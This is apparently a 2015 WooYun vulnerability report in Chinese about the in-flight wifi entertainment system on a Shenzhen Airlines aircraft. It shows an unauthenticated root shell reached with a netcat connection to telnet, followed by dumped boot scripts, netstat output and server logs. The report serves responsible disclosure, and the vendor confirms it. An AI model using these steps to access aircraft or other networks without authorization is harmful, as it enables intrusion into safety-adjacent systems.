当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143525

漏洞标题:深圳航空某飞机上云图wifi存在后门可被控制点播系统(一定条件可连接内部网络)

相关厂商:深圳航空

漏洞作者: 路人甲

提交时间:2015-09-26 01:37

修复时间:2015-11-10 14:00

公开时间:2015-11-10 14:00

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-26: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经确认,细节仅向厂商公开
2015-10-06: 细节向核心白帽子及相关领域专家公开
2015-10-16: 细节向普通白帽子公开
2015-10-26: 细节向实习白帽子公开
2015-11-10: 细节向公众公开

简要描述:

坐飞机无聊啊

详细说明:

连上深圳航空的云图之后发现深处一个网络通过192.168.2.99进行访问云图

nc -vv 192.168.2.2 23
found 0 associations
found 1 connections:
     1:flags=82<CONNECTED,PREFERRED>
outif en0
src 192.168.2.88 port 59300
dst 192.168.2.2 port 23
rank info not available
TCP aux info available
Connection to 192.168.2.2 port 23 [tcp/telnet] succeeded!
????????
bash-3.00#


什么鬼这是,直接连上?

netstat -an
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 0.0.0.0:8554            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:8300            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      
tcp        0      0 192.168.2.2:8080        192.168.2.99:60361      TIME_WAIT   
tcp        0      0 192.168.2.2:8080        192.168.2.99:60440      TIME_WAIT   
tcp        0      0 192.168.2.2:8080        192.168.2.99:60726      TIME_WAIT   
tcp        0      0 192.168.2.2:42675       192.168.2.99:7890       ESTABLISHED 
tcp        0    547 192.168.2.2:23          192.168.2.88:59300      ESTABLISHED 
tcp        0      0 192.168.2.2:8080        192.168.2.99:60519      TIME_WAIT   
tcp        0      0 192.168.2.2:38879       192.168.2.99:8911       ESTABLISHED 
tcp        0      0 192.168.2.2:42679       192.168.2.99:7890       ESTABLISHED 
tcp        0      0 192.168.2.2:8080        192.168.2.99:60596      TIME_WAIT   
tcp        0      0 192.168.2.2:38878       192.168.2.99:8911       ESTABLISHED 
tcp        0      0 192.168.2.2:8080        192.168.2.99:60663      TIME_WAIT


看看代码

cat *.sh
cat *.sh
#!/bin/sh
echo "================Enter runapp.sh========================="
#start the telnetd service;
telnetd -l /bin/bash
cp /tango/pointercal /etc
#insmod the sata/usb ko
modprobe sata_tango3
modprobe tangox-ehci-hcd
modprobe usb-storage 
echo "================Build /tmp/sda2 directory========================="
mkdir /tmp/sda2
mkdir /tmp/sda3
mkdir /mnt/sdk
mkdir /mnt/nfs
mount /dev/sda2 /tmp/sda2
mount /dev/sda3 /tmp/sda3
/tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
#!/bin/sh
if [ ! -d "/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/" ]; then
   mkdir /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/ -p
fi
#firmware
if [ -d "/tmp/sda2/newfw" ] && [ -d "/tmp/sda2/newfw/release/avod" ] &&
[ -d "/tmp/sda2/newfw/sdk" ] && [ -d "/tmp/sda2/newfw/release/mini_httpd" ] && 
[ -d "/tmp/sda2/newfw/release/wwwroot" ] ;then                                  
#&& [ -d "/tmp/sda2/newfw/sdkavod" ]
   echo "Found new firmware..."      
                              
   rm /tmp/sda2/avod -rf                                              
   mv /tmp/sda2/newfw/release/avod  /tmp/sda2/  -f   
   chmod 777 /tmp/sda2/avod -R                
   
   if [ -d "/tmp/sda2/newfw/release/conf" ] ;then
       rm /tmp/sda2/conf -rf
       mv /tmp/sda2/newfw/release/conf /tmp/sda2/conf -f
       chmod 777 /tmp/sda2/conf -R
   fi
   
   rm /tmp/sda2/sdk -rf   
   mv /tmp/sda2/newfw/sdk  /tmp/sda2/   -f    
   
  #Only for Browser upgrade
        if [ -d "/tmp/sda2/newfw/sdkavod" ] ;then
                rm /tmp/sda2/sdkavod/install -rf
                rm /tmp/sda2/sdkavod/lib -rf
                mv /tmp/sda2/newfw/sdkavod/install/  /tmp/sda2/sdkavod/ -f
                mv /tmp/sda2/newfw/sdkavod/lib/  /tmp/sda2/sdkavod/ -f
        fi 
   
#   rm /tmp/sda2/sdkavod -rf                                                                         
#   mv /tmp/sda2/newfw/sdkavod  /tmp/sda2/  -f                                    
   rm /tmp/sda3/mini_httpd -rf
   mv /tmp/sda2/newfw/release/mini_httpd /tmp/sda3/mini_httpd
   chmod 777 /tmp/sda3/mini_httpd -R
   
   rm /tmp/sda3/wwwroot -rf
   mv /tmp/sda2/newfw/release/wwwroot /tmp/sda3/wwwroot
   chmod 777 /tmp/sda3/wwwroot -R
   
   rm /tmp/sda2/newfw -rf
   sync                  
   
   if [ ! -d "/tango/conf/" ] ;then
      mkdir /tango/conf -p
   fi                       
   
   if [ -f "/tmp/sda2/update/system_version_info.xml" ] ;then
       cp /tmp/sda2/update/system_version_info.xml /tango/conf -f
   else
       echo "--->>ERR:can not find system version file"
   fi        
#add update kernel
        echo "begin to update firmware!"
        /tmp/sda2/avod/updatefirmware.sh
   source /tango/release/runapp.sh
   echo "Firwmare update success!"
   exit                                      
fi 
cd /tmp/sda2/sdkavod/mrua
source run.env
fw_reload
#mkdir /home/antony
ln -s /tmp/sda2/sdkavod/lib /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib
ln -s /tmp/sda2/sdkavod/install /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/install
export LD_LIBRARY_PATH=/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib:$LD_LIBRARY_PATH
#for cmt smartlcd
#cp /tmp/sda2/avod/libdrvMrua_usb_cmt.so /lib/libdrvMrua.so
cp /tmp/sda2/avod/libdrvMrua_12inch.so /lib/libdrvMrua.so
#cp log lib
echo "copy log lib"
cp /tmp/sda2/avod/liblog.so /lib/ -f
cp /tmp/sda2/avod/libcurl.so.4 /lib/ -f
export QWS_DISPLAY=linuxfb
export  QWS_SIZE=1280x800
export QWS_MOUSE_PROTO=linuxtp
cd /tmp/sda2/sdkavod/dcchd_SMP8652_3_8_2_black.mips/
source trun.env
cd /tmp/sda2/avod 
# for cmt
ln -sf PD035Vx2.vmf.cmt PD035Vx2.vmf
#leib++ for parse the ipaddr from the /tango/avod/ipaddr.cfg
#/tmp/sda2/avod/ipconfig.sh
#udhcpc -q&
#use fixed ip 192.168.2.2
/sbin/ifconfig eth0 192.168.2.2 up
/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf & 
echo "starting control module ....."
/tmp/sda2/avod/control_module &
sleep 10
route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0
sleep 5
echo "starting play_sub_module ....."
/tmp/sda2/avod/play_sub_module &
sleep 10
echo "starting browser ....."
/tmp/sda2/avod/browser -size 1280x800 -qws http://127.0.0.1/cmt_welcome/welcome.html &
cp -rf /tmp/sda2/avod/ppp   /etc/                                    
cp -rf /tmp/sda2/avod/ppp/resolv.conf   /etc/
cp -f /tmp/sda2/avod/pppd    /usr/sbin
cp -f /tmp/sda2/avod/chat     /usr/sbin
route del -net default
sleep 5
echo "start 3g_control module"
/tmp/sda2/avod/3g_control&
sleep 10
echo "starting cmt_cma_module ....."
/tmp/sda2/avod/cmt_cma_module &
echo "starting pcu_comm_module ....."
/tmp/sda2/avod/pcu_comm_module &
echo "starting upgradeModule ....."
/tmp/sda2/avod/upgradeModule &
echo "starting cmt_suu ....."
/tmp/sda2/avod/cmt_suu &
#add by hirry for ftpd
echo "star ftpd ....."
/tmp/sda2/avod/ftp/autoftpd.sh
#end by hirry for ftpd
sleep 5
modprobe snd_seq_oss
modprobe snd_pcm_oss
sleep 2
echo "starting wis-streamer ...." 
/tmp/sda2/avod/wis-streamer -pcm -nv &
#cp /tmp/sda2/avod/resolv.conf /etc/ -f
LD_LIBRARY_PATH=/lib:/usr/lib/:/usr/local/lib:$LD_LIBRARY_PATH
echo "Starting logmodule ......"
/tmp/sda2/avod/logmodule_cmt &
echo "Starting bitemodule ....."
/tmp/sda2/avod/bitemodule_cmt &
echo "Starting proxysyn_mips..."
/tmp/sda2/avod/proxysyn_mips &
#echo "Starting neusoft dldir..."
#/tmp/sda3/wwwroot/neusoft/ok/dldir/dldir &
echo "Starting nginx..."                                                                                                 
/tmp/sda3/wwwroot/nginx/sbin/nginx -p /tmp/sda3/wwwroot/nginx/ & 
echo "all application booted ....."
find /tmp/sda2/avod/logs -mtime +15 -name "*log" -exec rm -f {} \;
#add copy kernel
/tmp/sda2/avod/copykernel.sh&
killall mini_httpd


原来的确是个vod点播系统啊,另外从日志里看一定时候是可以访问10网络的

192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/download/20150923000001024616.d.icup HTTP/1.1" 206 358560 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/checkFileSize/20150923000001024615.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:09 +0800] "GET /Air/checkFileSize/20150923000001024616.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/download/20150923000001024617.d.icup HTTP/1.1" 206 163522 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/checkFileSize/20150923000001024617.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024617.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:12 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024615.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:13 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024616.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:41 +0800] "GET /Air/download/20150923000001024619.d.icup HTTP/1.1" 206 343755 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:42 +0800] "GET /Air/download/20150923000001024618.d.icup HTTP/1.1" 206 540360 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024619.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024618.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:45 +0800] "GET /Air/download/20150923000001024620.d.icup HTTP/1.1" 206 452793 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:46 +0800] "GET /Air/checkFileSize/20150923000001024620.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:47 +0800] "GET /Air/download/20150923000001024622.d.icup HTTP/1.1" 206 98965 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024620.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "GET /Air/checkFileSize/20150923000001024622.d.icup HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


漏洞证明:

telnetd -l /bin/bash

是后门?

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-26 13:59

厂商回复:

感谢您对深航信息系统的关心,已安排人员修复。

最新状态:

暂无